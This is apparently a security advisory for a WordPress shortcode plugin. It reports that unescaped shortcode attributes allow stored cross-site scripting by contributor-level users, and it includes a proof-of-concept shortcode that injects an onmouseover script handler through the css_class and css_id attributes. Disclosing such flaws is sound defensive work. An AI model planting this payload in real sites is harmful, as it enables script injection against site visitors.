Description The plugin does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks
[otw_shortcode_tabslayout tabs=“2” title=“234” tab_1_title=“34” tab_1_icon_url=“http://123” tab_1_content=“23” tab_2_title=“123” tab_2_icon_type=“general foundicon-page” tab_2_icon_url=“123” tab_2_content=“123” css_class=‘" onmouseover=“alert(/XSS/)”’ css_id=‘" onmouseover=“alert(/XSS/)”’][/otw_shortcode_tabslayout]